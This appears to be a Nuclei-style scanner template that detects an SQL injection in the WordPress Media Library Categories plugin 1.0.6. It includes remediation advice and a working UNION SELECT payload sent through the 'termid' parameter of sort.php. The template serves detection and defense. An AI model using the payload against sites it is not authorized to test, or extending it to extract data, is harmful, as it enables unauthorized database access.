id: Wordpress-Media_Library_Categories_Plugins-SQLi
info:
  name: WordPress Media Library Categories plugin 1.0.6 - SQL Injection
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Media Library Categories 'termid' parameter SQL injection vulnerability
    WordPress is a blogging platform developed by the WordPress Software Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers.

    A SQL injection vulnerability exists in the Media Library Categories plugin for WordPress. This vulnerability stems from the fact that the data provided by the user is not fully filtered before being used in SQL queries. Remote attackers can use the termid parameter to access or modify the data.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/

    Temporary fix:
    1. Use precompiled statements. When using PDO, be careful not to splice variables directly into PDO statements. All query statements use the parameterized query interface provided by the database. Parameterized statements use parameters instead of embedding user input variables into the SQL statement. Almost all current database systems provide parameterized SQL statement execution interfaces. Using this interface can very effectively prevent SQL injection attacks.
    2. Escape or code the special characters (’”<>&*;, etc.) that enter the database.
    3. Confirm the type of each data. For example, numeric data must be numbers, and the storage fields in the database must correspond to int types.
    4. The data length should be strictly specified, which can prevent relatively long SQL injection statements from being executed correctly to a certain extent.
    5. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding for all data. Inconsistent encoding of the upper and lower layers may cause some filtering models to be bypassed.
    6. Strictly limit the database operation permissions of website users, and provide this user with permissions that are only sufficient for his or her work, thereby minimizing the harm of injection attacks to the database.
    7. Prevent the website from displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
    8. Filter dangerous characters, for example: use regular expressions to match keywords such as union, sleep, and, select, load_file, etc. If a match is found, the operation will be terminated.
requests:
- matchers:
  - type: status
    status:
    - 200
  - type: word
    words:
    - e165421110ba03099a1c0393373c5b43
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/media-library-categories/sort.php?termid=-1%20UNION%20ALL%20SELECT%20md5(233),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20'
  method: GET
